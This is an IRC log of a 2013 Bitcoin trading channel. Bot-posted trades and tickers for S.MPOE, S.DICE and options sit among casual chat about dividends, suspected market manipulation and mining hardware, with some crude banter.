Feb 25 05:44:30 [MPEX] [S.MPOE] 5000 @ 0.00068316 = 3.4158 BTC [-] Feb 25 05:44:31 pretty much what mpex does is what's usual. Feb 25 05:44:37 what the... Feb 25 05:45:53 [MPEX] [S.MPOE] 5000 @ 0.00068316 = 3.4158 BTC [-] Feb 25 05:46:05 [MPEX] [S.MPOE] 13500 @ 0.00068316 = 9.2227 BTC [-] Feb 25 05:46:24 someone really loves MPOE Feb 25 05:47:21 [MPEX] [S.MPOE] 1000 @ 0.00068316 = 0.6832 BTC [-] Feb 25 05:47:39 Maybe some early adopter with a large stash thinks, hey, there's not a lot of dividends right now, but MPEx is the major player in bitcoin stocks. I want in early on that too. Feb 25 05:48:08 the truth of the matter here is, there's 10mn bitcoins in circulation and 1.5ish mn worth of stocks Feb 25 05:48:12 this is unbalanced. Feb 25 05:48:21 some people don't want to earn on their bitcoin, but i would guess most do. Feb 25 05:48:30 yeah Feb 25 05:49:14 and welll... it being bitcoin, whatever return is a good return. no inflation and all that Feb 25 05:49:20 course, it has to pay the risk. Feb 25 05:50:39 i wonder if the buyer will start buying up passthru shares too Feb 25 05:50:49 aye Feb 25 05:51:28 [MPEX] [S.MPOE] 23400 @ 0.00069659 = 16.3002 BTC [+] Feb 25 05:51:29 [MPEX] [S.MPOE] 5000 @ 0.0006999 = 3.4995 BTC [+] Feb 25 05:51:36 here we go again Feb 25 05:51:36 [MPEX] [S.MPOE] 94280 @ 0.0007 = 65.996 BTC [+] Feb 25 05:51:37 [MPEX] [S.MPOE] 4320 @ 0.00071608 = 3.0935 BTC [+] Feb 25 05:51:54 aww false alarm Feb 25 05:52:12 i guess there really arent all that many on offer from the PTs Feb 25 05:52:39 whoever did this (if it's 1 person) doesn't strike me as a pt player. Feb 25 05:53:23 [MPEX] [S.MPOE] 23000 @ 0.00071608 = 16.4698 BTC [+] Feb 25 05:53:34 indeed Feb 25 05:53:39 Too bad he's not spreading the love to S.DICE! Feb 25 05:53:41 [HAVELOCK] [SDICE] 1 @ 0.694 BTC [+] Feb 25 05:53:54 even if it's two people, one with the 2k the other with the 900 Feb 25 05:54:08 i guess it would be like that, 2 people + maybe some followers Feb 25 06:00:13 mircea_popescu: how many shares of s.mpoe have you now sold? Feb 25 06:05:41 something like 100mn Feb 25 06:05:57 [MPEX] [S.MPOE] 4321 @ 0.00064455 = 2.7851 BTC [-] Feb 25 06:05:59 [MPEX] [S.MPOE] 479 @ 0.00064454 = 0.3087 BTC [-] Feb 25 06:06:24 nice Feb 25 06:06:33 10% Feb 25 06:06:42 [HAVELOCK] [SDICE] 26 @ 0.6939 = 18.0414 BTC [-] Feb 25 06:07:16 about, ya. Feb 25 06:07:38 [MPEX] [S.MPOE] 4321 @ 0.0006532 = 2.8225 BTC [+] Feb 25 06:07:39 [MPEX] [S.MPOE] 28800 @ 0.00065334 = 18.8162 BTC [+] Feb 25 06:07:41 [MPEX] [S.MPOE] 2000 @ 0.00069393 = 1.3879 BTC [+] Feb 25 06:07:41 [MPEX] [S.MPOE] 500 @ 0.00069395 = 0.347 BTC [+] Feb 25 06:07:47 [MPEX] [S.MPOE] 17881 @ 0.00069396 = 12.4087 BTC [+] Feb 25 06:07:48 [MPEX] [S.MPOE] 18800 @ 0.00069419 = 13.0508 BTC [+] Feb 25 06:07:51 [MPEX] [S.MPOE] 1000 @ 0.00071607 = 0.7161 BTC [+] Feb 25 06:07:52 [MPEX] [S.MPOE] 26982 @ 0.00071608 = 19.3213 BTC [+] Feb 25 06:07:54 [MPEX] [S.MPOE] 2000000 @ 0.00075 = 1500 BTC [+] Feb 25 06:08:00 ! Feb 25 06:08:01 dude this is too exciting to sleep Feb 25 06:08:23 zp,h Feb 25 06:08:27 zomg Feb 25 06:08:31 shift. Feb 25 06:08:32 goddammit, I sold way to low Feb 25 06:08:36 too Feb 25 06:08:41 i just missed 65 :)) Feb 25 06:09:08 zp,h lol Feb 25 06:09:27 literally. Feb 25 06:09:33 anyway, those 2mn were me. Feb 25 06:09:37 i HAD JUST PUT THEM IN Feb 25 06:10:06 so put some in at 80, see what happens Feb 25 06:10:18 i think tomorrow. Feb 25 06:10:43 see, all s.dice has to do is post low dividends, and it'll skyrocket! Feb 25 06:10:51 lol srsly. Feb 25 06:11:05 actually there may be something to this. Feb 25 06:11:25 maybe it helps credibility. Feb 25 06:11:35 scams rarely have bad months. Feb 25 06:11:51 !ticket m s.mpoe Feb 25 06:11:53 fuck Feb 25 06:11:57 lol Feb 25 06:11:59 !ticker m s.mpoe Feb 25 06:12:00 for what, speeding ? Feb 25 06:12:01 [MPEX:S.MPOE] 1D: 0.00061614 / 0.00068811 / 0.00075 (11161674 shares, 7,680.56 BTC), 7D: 0.00061614 / 0.00066753 / 0.00075 (20661247 shares, 13,792.07 BTC), 30D: 0.0006153 / 0.000667 / 0.00075 (71180381 shares, 47,478.00 BTC) Feb 25 06:12:08 lol Feb 25 06:12:49 goddammit, I sold way to low << this btw Feb 25 06:12:59 mpex is almost as difficult to time as the real markets Feb 25 06:13:07 i think every trader has a story of this by now. Feb 25 06:13:07 yeah, I thought I was real clever Feb 25 06:13:50 anyway, im going to have my cock sucked now. Feb 25 06:13:52 catch you all later. Feb 25 06:14:00 see ya Feb 25 06:14:24 chart porn Feb 25 06:14:25 http://shrani.si/f/2H/ES/V2gy30r/mp.png Feb 25 06:20:53 [MPEX] [S.MPOE] 700 @ 0.00075872 = 0.5311 BTC [+] Feb 25 06:21:36 [BTCTC] [S.MPOE-PT] 4000 @ 0.0007 = 2.8 BTC [+] Feb 25 06:23:07 ut Feb 25 06:23:14 there go the PT shares Feb 25 06:23:18 hehe Feb 25 06:24:39 [MPEX] [S.MPOE] 500 @ 0.00075872 = 0.3794 BTC [+] Feb 25 06:27:46 [BTCTC] [RSM] 1 @ 0.008 BTC [+] Feb 25 06:28:34 Seems like it Feb 25 06:31:19 [MPEX] [S.MPOE] 9450 @ 0.00075872 = 7.1699 BTC [+] Feb 25 06:32:03 mircea_popescu I want you to be the first to read our script based on an article you wrote Feb 25 06:37:08 [MPEX] [S.MPOE] 7046 @ 0.00075872 = 5.3459 BTC [+] Feb 25 06:37:10 [MPEX] [S.MPOE] 399716 @ 0.00075 = 299.787 BTC [-] Feb 25 06:37:15 [MPEX] [S.MPOE] 50238 @ 0.00073278 = 36.8134 BTC [-] Feb 25 06:38:03 Mwahahaha Feb 25 06:38:24 :) Feb 25 06:38:45 amazing it is. Feb 25 06:39:06 soon I will be able to use BTC to finance real life business ventures Feb 25 06:39:24 hm? Feb 25 06:39:28 ah, wall at 75 Feb 25 06:39:44 nicley done Feb 25 06:39:55 now crash back bitch Feb 25 06:40:52 [MPEX] [S.MPOE] 500 @ 0.00074017 = 0.3701 BTC [+] Feb 25 06:43:27 [MPEX] [S.MPOE] 1500 @ 0.00074017 = 1.1103 BTC [+] Feb 25 06:43:42 [MPEX] [S.MPOE] 5700 @ 0.00074017 = 4.219 BTC [+] Feb 25 06:44:28 I wish smickles was around so I could short. Feb 25 06:45:44 This shit is literally a cash generator Feb 25 06:45:46 holy fuck Feb 25 06:46:02 Thank you for making my money mircea_popescu Feb 25 06:50:49 lol so many complaints over bfl bet, yet someone posts exactly the same wording for a rematch just different dates Feb 25 06:51:45 [MPEX] [S.MPOE] 81 @ 0.00073278 = 0.0594 BTC [-] Feb 25 06:51:47 [MPEX] [S.MPOE] 19077 @ 0.00072073 = 13.7494 BTC [-] Feb 25 06:52:00 the way of the road. Feb 25 06:54:06 So BFL is confirmed not shipping by March 1st? Feb 25 06:54:19 dunno Feb 25 06:54:21 [MPEX] [S.MPOE] 1500 @ 0.00074 = 1.11 BTC [+] Feb 25 06:54:24 its not march 1st yet eh Feb 25 06:55:26 [MPEX] [S.MPOE] 20950 @ 0.00075 = 15.7125 BTC [+] Feb 25 06:55:39 fuck me. Feb 25 06:55:50 another asic chip went into production. Feb 25 06:56:01 are these collectors items or what Feb 25 06:56:40 Very collectible, especially with golden foil on 'em. Feb 25 06:56:53 who? Feb 25 06:57:18 ;;bc,estimate Feb 25 06:57:19 4299621.26615542 Feb 25 06:57:23 ;;estimate Feb 25 06:57:24 Next difficulty estimate | 4299621.26616 based on data since last change | 4269774.15066 based on data for last three days Feb 25 06:57:29 ;;bc,stats Feb 25 06:57:32 Current Blocks: 222975 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 800 blocks | Next Difficulty In About: 4 days, 16 hours, 56 minutes, and 28 seconds | Next Difficulty Estimate: 4299621.26616 | Estimated Percent Change: 17.7652 Feb 25 06:59:24 [MPEX] [S.MPOE] 7694 @ 0.00074085 = 5.7001 BTC [-] Feb 25 07:01:06 [MPEX] [S.MPOE] 3106 @ 0.00072876 = 2.2635 BTC [-] Feb 25 07:10:50 thestringpuller cool Feb 25 07:10:59 came already? Feb 25 07:11:03 :D Feb 25 07:11:18 she milked you good? Feb 25 07:12:32 hehehe Feb 25 07:12:48 it's an artform. **** BEGIN LOGGING AT Mon Feb 25 14:59:28 2013 Feb 25 15:02:01 !ticker m s.mpoe Feb 25 15:02:03 [MPEX:S.MPOE] 1D: 0.00061614 / 0.00070305 / 0.00078 (13057759 shares, 9,180.32 BTC), 7D: 0.00061614 / 0.00067682 / 0.00078 (22659689 shares, 15,336.56 BTC), 30D: 0.0006153 / 0.00066965 / 0.00078 (72800222 shares, 48,751.11 BTC) Feb 25 15:03:35 [MPEX] [S.MPOE] 9000 @ 0.00076106 = 6.8495 BTC [+] Feb 25 15:03:37 [MPEX] [S.MPOE] 3000 @ 0.00076232 = 2.287 BTC [+] Feb 25 15:03:46 [MPEX] [S.MPOE] 3000 @ 0.00076233 = 2.287 BTC [+] Feb 25 15:03:48 [MPEX] [S.MPOE] 6158 @ 0.00076234 = 4.6945 BTC [+] Feb 25 15:03:53 [MPEX] [S.MPOE] 1742 @ 0.0007627 = 1.3286 BTC [+] Feb 25 15:04:37 [MPEX] [S.MPOE] 2600 @ 0.0007627 = 1.983 BTC [+] Feb 25 15:15:31 [MPEX] [S.MPOE] 25106 @ 0.00075736 = 19.0143 BTC [-] Feb 25 15:15:33 [MPEX] [S.MPOE] 3000 @ 0.00075561 = 2.2668 BTC [-] Feb 25 15:15:34 [MPEX] [S.MPOE] 344 @ 0.0007556 = 0.2599 BTC [-] Feb 25 15:23:37 [MPEX] [O.BTCUSD.C250T] 87 @ 0.36450776 = 31.7122 BTC [+] Feb 25 15:23:49 [MPEX] [O.BTCUSD.C270T] 214 @ 0.32470844 = 69.4876 BTC [+] Feb 25 15:23:58 [MPEX] [O.BTCUSD.C290T] 389 @ 0.28918014 = 112.4911 BTC Feb 25 15:24:13 [MPEX] [O.BTCUSD.C310T] 553 @ 0.25778105 = 142.5529 BTC [-] Feb 25 15:24:23 [MPEX] [O.BTCUSD.C330T] 748 @ 0.23014246 = 172.1466 BTC Feb 25 15:24:41 [MPEX] [O.BTCUSD.C370T] 882 @ 0.18423278 = 162.4933 BTC Feb 25 15:24:44 [MPEX] [O.BTCUSD.C350T] 916 @ 0.2057493 = 188.4664 BTC Feb 25 15:25:00 [MPEX] [O.BTCUSD.C390T] 640 @ 0.16526197 = 105.7677 BTC Feb 25 15:25:13 [MPEX] [O.BTCUSD.C410T] 407 @ 0.14853807 = 60.455 BTC Feb 25 15:25:29 [MPEX] [O.BTCUSD.C430T] 215 @ 0.1337927 = 28.7654 BTC Feb 25 15:25:46 [MPEX] [O.BTCUSD.C450T] 42 @ 0.12078624 = 5.073 BTC Feb 25 15:28:41 [MPEX] [S.MPOE] 10100 @ 0.0007556 = 7.6316 BTC [-] Feb 25 15:35:36 good morning everyone Feb 25 15:36:42 mornin Feb 25 15:40:46 [MPEX] [S.MPOE] 3000 @ 0.00075561 = 2.2668 BTC [+] Feb 25 15:40:47 [MPEX] [S.MPOE] 5214 @ 0.0007556 = 3.9397 BTC [-] Feb 25 15:42:08 [MPEX] [S.MPOE] 3000 @ 0.00076269 = 2.2881 BTC [+] Feb 25 15:42:10 [MPEX] [S.MPOE] 12908 @ 0.0007627 = 9.8449 BTC [+] Feb 25 15:42:15 [MPEX] [S.MPOE] 2792 @ 0.00076344 = 2.1315 BTC [+] Feb 25 15:48:42 [MPEX] [S.MPOE] 680 @ 0.0007556 = 0.5138 BTC [-] Feb 25 15:49:08 ;;ticker Feb 25 15:49:09 BTCUSD ticker | Best bid: 30.08134, Best ask: 30.23999, Bid-ask spread: 0.15865, Last trade: 30.24636, 24 hour volume: 32160.41669674, 24 hour low: 29.20123, 24 hour high: 30.39877, 24 hour vwap: 29.91529 Feb 25 15:56:03 [MPEX] [S.MPOE] 14302 @ 0.0007493 = 10.7165 BTC [-] Feb 25 15:56:21 [BTCTC] [S.BBET-PT] 40 @ 0.0022 = 0.088 BTC [+] Feb 25 15:59:07 [BTCTC] [S.BBET-PT] 40 @ 0.0022 = 0.088 BTC [+] Feb 25 16:04:13 [MPEX] [S.MPOE] 3000 @ 0.00074931 = 2.2479 BTC [+] Feb 25 16:04:15 [MPEX] [S.MPOE] 8149 @ 0.0007493 = 6.106 BTC [-] Feb 25 16:04:17 [MPEX] [S.MPOE] 4000 @ 0.0007439 = 2.9756 BTC [-] Feb 25 16:04:18 [MPEX] [S.MPOE] 19750 @ 0.0007392 = 14.5992 BTC [-] Feb 25 16:04:32 [MPEX] [S.MPOE] 8501 @ 0.00073816 = 6.2751 BTC [-] Feb 25 16:07:14 working to put up another asset Feb 25 16:07:22 curious to see how this one sells Feb 25 16:07:28 it has good profits too Feb 25 16:07:57 he wants to launch his early bird asap in surprise fashion as well... so be warned. anyone Feb 25 16:09:57 ukto moar info Feb 25 16:10:23 cant, not yet Feb 25 16:10:41 I can tell you their dec. and jan. profits were 2x what ziggap was Feb 25 16:10:47 but its merchandise based Feb 25 16:10:59 the more the community supports bitcoin, the more profits it makes. ;) Feb 25 16:11:24 [MPEX] [S.MPOE] 17199 @ 0.00073816 = 12.6956 BTC [-] Feb 25 16:11:26 [MPEX] [S.MPOE] 10073 @ 0.00073534 = 7.4071 BTC [-] Feb 25 16:11:31 http://24.media.tumblr.com/tumblr_m0scugsLut1r786ovo1_500.jpg Feb 25 16:11:43 roflol Feb 25 16:12:38 http://24.media.tumblr.com/tumblr_m0scugsLut1r786ovo1_500.jpg Feb 25 16:12:40 HAHAHAHA Feb 25 16:12:40 http://24.media.tumblr.com/tumblr_m0scugsLut1r786ovo1_500.jpg Feb 25 16:12:40 ? Feb 25 16:12:42 http://24.media.tumblr.com/tumblr_m0scugsLut1r786ovo1_500.jpg Feb 25 16:12:42 Hahaha Feb 25 16:12:42 http://24.media.tumblr.com/tumblr_m0scugsLut1r786ovo1_500.jpg Feb 25 16:12:43 http://24.media.tumblr.com/tumblr_m0scugsLut1r786ovo1_500.jpg Feb 25 16:12:48 oops Feb 25 16:12:53 it all makes sense! Feb 25 16:12:53 bad copy thorugh ssh, pardon Feb 25 16:13:32 Ukto: The community is the Bitcoin profit Feb 25 16:13:59 [MPEX] [S.MPOE] 3000 @ 0.00075476 = 2.2643 BTC [+] Feb 25 16:14:01 [MPEX] [S.MPOE] 12420 @ 0.00075477 = 9.3742 BTC [+] Feb 25 16:14:03 [MPEX] [S.MPOE] 26577 @ 0.00076344 = 20.2899 BTC [+] Feb 25 16:14:06 [MPEX] [S.MPOE] 5803 @ 0.0007637 = 4.4318 BTC [+] Feb 25 16:14:26 paste in bf room ukto Feb 25 16:14:54 [BTCTC] [S.MPOE-PT] 8 @ 0.00072 = 0.0058 BTC [+] Feb 25 16:14:56 [BTCTC] [S.MPOE-PT] 19 @ 0.00072 = 0.0137 BTC [+] Feb 25 16:21:16 [MPEX] [S.MPOE] 1264 @ 0.0007637 = 0.9653 BTC [+] Feb 25 16:21:18 [MPEX] [S.MPOE] 9936 @ 0.00076424 = 7.5935 BTC [+] Feb 25 16:28:24 [MPEX] [S.MPOE] 17300 @ 0.00076423 = 13.2212 BTC [-] Feb 25 16:28:26 [MPEX] [S.MPOE] 1300 @ 0.00076424 = 0.9935 BTC [+] Feb 25 16:39:00 Ukto: you around? Feb 25 16:39:08 >,> Feb 25 16:39:10 might be.. Feb 25 16:39:13 did something break? Feb 25 16:39:13 I WANT MY FINAL FANTASY Feb 25 16:39:14 jkjkjk Feb 25 16:39:17 if so, I am not here Feb 25 16:39:27 was waiting on you && smickles Feb 25 16:39:27 :P Feb 25 16:39:33 i know I was jk Feb 25 16:39:37 He's super busy it seems Feb 25 16:39:54 He'll have like 2 weeks of chat logs to catch up on. Feb 25 16:40:00 SO HOWEVER Feb 25 16:40:22 he'll def get to it I think, I'm also trying to purchase something through kakobrekla too Feb 25 16:47:31 [MPEX] [S.MPOE] 2750 @ 0.00076097 = 2.0927 BTC [-] Feb 25 16:47:33 [MPEX] [S.MPOE] 9550 @ 0.00075356 = 7.1965 BTC [-] Feb 25 16:50:08 ;;ticker Feb 25 16:50:08 BTCUSD ticker | Best bid: 30.29801, Best ask: 30.29902, Bid-ask spread: 0.00101, Last trade: 30.29800, 24 hour volume: 30648.18333089, 24 hour low: 29.20123, 24 hour high: 30.39877, 24 hour vwap: 29.93325 Feb 25 16:51:14 ;;bids 29.20123 Feb 25 16:51:16 There are currently 3969.8947 bitcoins demanded at or over 29.20123 USD, worth 117518.199016 USD in total. Feb 25 16:51:55 [MPEX] [S.DICE] 438 @ 0.00619998 = 2.7156 BTC [+] Feb 25 16:51:58 [MPEX] [S.DICE] 2000 @ 0.00619999 = 12.4 BTC [+] Feb 25 16:52:04 [MPEX] [S.DICE] 2562 @ 0.0062 = 15.8844 BTC [+] Feb 25 16:52:05 ;;asks 30.39877 Feb 25 16:52:07 There are currently 817.7338 bitcoins offered at or under 30.39877 USD, worth 24827.8732594 USD in total. Feb 25 16:52:49 [HAVELOCK] [SDICE] 4 @ 0.635 = 2.54 BTC [-] Feb 25 16:52:50 [HAVELOCK] [SDICE] 2 @ 0.63334 = 1.2667 BTC [-] Feb 25 16:52:51 [HAVELOCK] [SDICE] 1 @ 0.633335 BTC [-] Feb 25 16:52:52 [HAVELOCK] [SDICE] 1 @ 0.6333 BTC [-] Feb 25 16:52:53 [HAVELOCK] [SDICE] 3 @ 0.6326 = 1.8978 BTC [-] Feb 25 16:52:54 [HAVELOCK] [SDICE] 11 @ 0.6325 = 6.9575 BTC [-] Feb 25 16:52:55 [HAVELOCK] [SDICE] 3 @ 0.63 = 1.89 BTC [-] Feb 25 16:52:56 [HAVELOCK] [SDICE] 2 @ 0.625 = 1.25 BTC [-] Feb 25 16:52:58 [HAVELOCK] [SDICE] 2 @ 0.62411 = 1.2482 BTC [-] Feb 25 16:52:59 [HAVELOCK] [SDICE] 21 @ 0.6241 = 13.1061 BTC [-] Feb 25 16:53:02 dumpthat shit Feb 25 16:53:11 money to mpoe Feb 25 16:57:44 [MPEX] [S.MPOE] 13900 @ 0.00076401 = 10.6197 BTC [+] Feb 25 16:58:04 whats up everyone Feb 25 16:59:25 hi mjr_, noticed s.mpoe? Feb 25 16:59:55 yep Feb 25 17:00:03 i commented on it earlier Feb 25 17:00:21 do people try to avoid the accounting headache of dividends? Feb 25 17:00:39 they were like, no way i will buy the day before i get money, too much work, let's buy after Feb 25 17:01:10 i know, just dont give me money, i hate having to keep track of it Feb 25 17:01:11 most backward prices ever...mpoe and sdice are both get cheaper the closer to dividends they get Feb 25 17:01:25 exactly Feb 25 17:01:39 i think it's awesome, i thought that they would price the future value of dividends into the stock price Feb 25 17:01:59 guess not, i will scoop up as much as possible lol Feb 25 17:02:28 looking forward to earnings for S.DICE...i kinda expect a small gain over last month...but not sure Feb 25 17:03:07 shorter month...and that one guy hit very nicely...but still overall not a big hit, i kinda hope it spurs on more gambling now that people see how much money you can make Feb 25 17:05:30 [MPEX] [S.MPOE] 19750 @ 0.00076401 = 15.0892 BTC [+] Feb 25 17:05:32 [MPEX] [S.MPOE] 3469 @ 0.00076424 = 2.6511 BTC [+] Feb 25 17:08:37 [MPEX] [S.MPOE] 3545 @ 0.00076424 = 2.7092 BTC [+] Feb 25 17:08:39 [MPEX] [S.MPOE] 11650 @ 0.00076446 = 8.906 BTC [+] Feb 25 17:08:41 [MPEX] [S.MPOE] 4405 @ 0.00076476 = 3.3688 BTC [+] Feb 25 17:10:51 mjr_: someone is controlling the options market Feb 25 17:11:51 thestringpuller don't say it's me again Feb 25 17:12:03 lol, i'm glad Feb 25 17:12:11 and yes, i think the bot is called MPOE Feb 25 17:12:16 it makes the market in most options Feb 25 17:12:22 so you could say it controls it Feb 25 17:12:41 [MPEX] [S.MPOE] 7750 @ 0.00075356 = 5.8401 BTC [-] Feb 25 17:12:43 [MPEX] [S.MPOE] 655 @ 0.00075355 = 0.4936 BTC [-] Feb 25 17:12:46 what i don't understand is why people would raise the price the day after dividends Feb 25 17:13:19 i have given up trying to make sense of other people, i in fact have stopped caring what price these stocks trade at, i just want dividends each month lol Feb 25 17:14:47 i expected this to happen... but earlier Feb 25 17:14:54 no someone is controlling mpoe bot Feb 25 17:15:11 thestringpuller MP is, obviously Feb 25 17:15:19 thats not what i meant Feb 25 17:15:46 someone is taking contracts from the bot and creating two winning positions Feb 25 17:16:00 pla explain Feb 25 17:16:02 so both the shadow man and the bot make money Feb 25 17:16:25 [MPEX] [S.MPOE] 14400 @ 0.00076476 = 11.0125 BTC [+] Feb 25 17:17:13 thestringpuller, in broad sense, this is well possible without any gray entity, with mkfut/split/whatever Feb 25 17:17:30 but can you point to exact trades you have an issue with? Feb 25 17:17:35 im almost certain the btc that just went into s.mpoe came from exiting a winning position Feb 25 17:17:58 someone with a lot more money than mircea is using mpoe to make made profit Feb 25 17:18:03 mad* Feb 25 17:18:36 at the beginning of every month someone enters a postion with like some 1000 btc in contracts Feb 25 17:18:51 then throughout it slowly gets filtered and sold back to mpoe Feb 25 17:19:14 i want to prove this but only kako is willing to sell me long term trade data Feb 25 17:19:47 if you weren't ignoring all my offers, you'd knew i have data, too Feb 25 17:19:57 and kako actually has them from me Feb 25 17:20:00 too :D Feb 25 17:20:02 [MPEX] [S.MPOE] 11242 @ 0.00076476 = 8.5974 BTC [+] Feb 25 17:20:04 [MPEX] [S.MPOE] 10650 @ 0.00076569 = 8.1546 BTC [+] Feb 25 17:20:05 how much data do you have? Feb 25 17:20:05 [MPEX] [S.MPOE] 2408 @ 0.00076623 = 1.8451 BTC [+] Feb 25 17:20:14 since october 22 Feb 25 17:20:14 what is your min offer Feb 25 17:20:31 2BTC Feb 25 17:20:38 data on options right? Feb 25 17:20:52 it's all trades,including options Feb 25 17:20:54 i don't understand Feb 25 17:21:03 so someone buys options and futures Feb 25 17:21:05 and makes money Feb 25 17:21:10 ... Feb 25 17:21:18 i don't buy them to lose money... Feb 25 17:21:31 blasphemy! Feb 25 17:21:48 and if you don't think that these markets, including mt. gox aren't manipulated constantly, then you haven't been watching Feb 25 17:22:08 and i am fine with that...if you don't really believe in your position, get out when the price moves "for no reason" Feb 25 17:22:10 i don't understand,too. if that money was from mpoe, it would show as mpoe loss Feb 25 17:22:22 i know that S.DICE makes money, cuz i see the blockchain Feb 25 17:22:37 if that wasn't from mpoe, then we'd clearly see options volume way above reported by mpoe Feb 25 17:22:41 i know that mpoe makes money, cuz i see the spreads on options and i see the shares being bought and sold Feb 25 17:23:01 so i get these for dividends, and i just hold them Feb 25 17:23:50 i have another conspiration theory: these evoorhees investors that sold s.dice decided to go long in s.mpoe Feb 25 17:24:17 seems actually more sensible to me.. they divesifying a portfolio Feb 25 17:24:24 if mpoe loses money the valie of mpex decreases Feb 25 17:24:50 someone with a lot of money has vested interest in it Feb 25 17:25:21 no i think that didn't happen... s.mpoe value seems pretty independent of dividends Feb 25 17:26:36 thestringpuller so do you want the data so badly or not? Feb 25 17:27:06 kako offered .5 Feb 25 17:27:25 can't it just be someone who wanted to control the market of the most frequently traded asset? Feb 25 17:28:06 ThickAsThieves we know for certain it's someone who had the money on mpex for a long time already Feb 25 17:28:16 there are no big deposits recently Feb 25 17:29:14 eh, hard to see a scenario where mpoe loses a signifigant amount of money Feb 25 17:29:29 you can make money in options, but the premiums you pay are usually pretty high Feb 25 17:29:30 so either it's someone who sold s.dice or wanted to buy and decided against it when he saw the mess Feb 25 17:29:43 what mess? Feb 25 17:30:09 mjr_ i mean evoorhees changing the plans every day Feb 25 17:30:20 oh, what are the plans now? Feb 25 17:30:26 nobody knows Feb 25 17:30:37 ie. there may be more shares being put on the market? Feb 25 17:30:37 evoor has also been mia for a bit Feb 25 17:30:44 he was traveling i think Feb 25 17:30:49 [MPEX] [S.MPOE] 17000 @ 0.00076475 = 13.0008 BTC [-] Feb 25 17:30:51 [MPEX] [S.MPOE] 9000 @ 0.00076623 = 6.8961 BTC [+] Feb 25 17:30:55 or in meetings, i heard Feb 25 17:30:58 but i talked to him friday Feb 25 17:31:02 oh cool Feb 25 17:31:36 while i see great long term value in mpoe, i honestly don;t understand the level of value it's at Feb 25 17:31:38 anyway, i hope we get more shares, i'm just curious as to how that would work...if he puts them out higher than last tranche Feb 25 17:31:54 mircea at least announced he will be selling several millions sometime in next 3 months iirc Feb 25 17:32:20 i think bitfunder is starting to look pretty attractive, though I think mpex still has the best stocks Feb 25 17:32:28 so that wouldn't be so big surprise if another mpoe wall arises Feb 25 17:32:33 bitfunder is pretty Feb 25 17:32:34 yeah Feb 25 17:32:42 but evoor... neither here nor there Feb 25 17:32:43 i like the simplicity of mpex Feb 25 17:33:19 [MPEX] [S.MPOE] 9600 @ 0.00075528 = 7.2507 BTC [-] Feb 25 17:33:59 [MPEX] [S.MPOE] 2000 @ 0.00075529 = 1.5106 BTC [+] Feb 25 17:34:01 [MPEX] [S.MPOE] 12615 @ 0.00075528 = 9.5279 BTC [-] Feb 25 17:49:00 ;;ticker Feb 25 17:49:01 BTCUSD ticker | Best bid: 30.17693, Best ask: 30.23121, Bid-ask spread: 0.05428, Last trade: 30.23121, 24 hour volume: 30722.27582138, 24 hour low: 29.20123, 24 hour high: 30.39877, 24 hour vwap: 29.94332 Feb 25 17:52:06 https://bitcointalk.org/index.php?topic=131270.msg1558355#msg1558355 Feb 25 17:52:22 ^^ MPBPT announced its bonds, let trolls descend Feb 25 18:05:03 [MPEX] [S.MPOE] 9050 @ 0.00075452 = 6.8284 BTC [-] Feb 25 18:07:57 ;;ticker Feb 25 18:07:58 BTCUSD ticker | Best bid: 30.20000, Best ask: 30.29999, Bid-ask spread: 0.09999, Last trade: 30.29999, 24 hour volume: 30135.68044112, 24 hour low: 29.20123, 24 hour high: 30.39877, 24 hour vwap: 29.94700 Feb 25 18:12:57 [MPEX] [S.MPOE] 17000 @ 0.00075356 = 12.8105 BTC [-] Feb 25 18:12:58 [MPEX] [S.MPOE] 7021 @ 0.00075355 = 5.2907 BTC [-] Feb 25 18:19:37 [MPEX] [S.MPOE] 6249 @ 0.00075355 = 4.7089 BTC [-] Feb 25 18:19:39 [MPEX] [S.MPOE] 14711 @ 0.00074502 = 10.96 BTC [-] Feb 25 18:20:06 http://bowdoinorient.com/article/8042 Feb 25 18:20:13 student papaer talks about SR Feb 25 18:20:35 In the past couple of years, however, anonymous online sites such as .Silk Road. have launched and made illicit drugs widely accessible to students who choose not to buy on campus Feb 25 18:23:33 [MPEX] [S.MPOE] 18035 @ 0.00075452 = 13.6078 BTC [+] Feb 25 18:28:58 [MPEX] [S.MPOE] 2000 @ 0.00076622 = 1.5324 BTC [+] Feb 25 18:29:00 [MPEX] [S.MPOE] 13700 @ 0.00076623 = 10.4974 BTC [+] Feb 25 18:31:05 http://shrani.si/f/3z/5A/4hKrTP8z/hockeystickglobalwarming.png Feb 25 18:32:41 [MPEX] [S.MPOE] 12462 @ 0.00076623 = 9.5488 BTC [+] Feb 25 18:32:43 [MPEX] [S.MPOE] 15288 @ 0.00076647 = 11.7178 BTC [+] Feb 25 18:36:13 similar effect on my portfolio value. Feb 25 18:39:17 where is bitfunder located? Feb 25 18:42:15 dunno, canadia? Feb 25 18:44:46 havelock investments is canada Feb 25 18:44:50 not sure about bitfunder Feb 25 18:49:50 [MPEX] [S.MPOE] 3000 @ 0.00075891 = 2.2767 BTC [-] Feb 25 18:55:11 [MPEX] [S.MPOE] 3511 @ 0.00076647 = 2.6911 BTC [+] Feb 25 18:55:13 [MPEX] [S.MPOE] 1025 @ 0.00076765 = 0.7868 BTC [+] Feb 25 18:55:24 [MPEX] [S.MPOE] 4810 @ 0.00076809 = 3.6945 BTC [+] Feb 25 19:01:15 [MPEX] [S.MPOE] 9490 @ 0.00076809 = 7.2892 BTC [+] Feb 25 19:01:17 [MPEX] [S.MPOE] 11460 @ 0.00076982 = 8.8221 BTC [+] Feb 25 19:04:56 [MPEX] [S.MPOE] 7800 @ 0.00076339 = 5.9544 BTC [-] Feb 25 19:09:03 [MPEX] [S.MPOE] 159 @ 0.00076099 = 0.121 BTC [-] Feb 25 19:09:09 [MPEX] [S.MPOE] 8489 @ 0.00076982 = 6.535 BTC [+] Feb 25 19:09:11 [MPEX] [S.MPOE] 3802 @ 0.0007702 = 2.9283 BTC [+] Feb 25 19:09:49 http://bowdoinorient.com/article/8042 Bowdoin student newspaper article mentioning Silk Road Feb 25 19:11:54 it's biased, alcohol is not included Feb 25 19:13:18 [MPEX] [S.MPOE] 17600 @ 0.00075892 = 13.357 BTC [-] Feb 25 19:13:20 [MPEX] [S.MPOE] 2993 @ 0.00075891 = 2.2714 BTC [-] Feb 25 19:14:45 could anyone give me a pyramining ref link? Feb 25 19:15:23 it's biased, it's written by a person Feb 25 19:15:37 Cylte try #bitcoin-mining Feb 25 19:15:47 Cylta: ^ Feb 25 19:15:53 okay, thanks Feb 25 19:38:27 [MPEX] [S.MPOE] 10719 @ 0.0007672 = 8.2236 BTC [+] Feb 25 19:39:14 [MPEX] 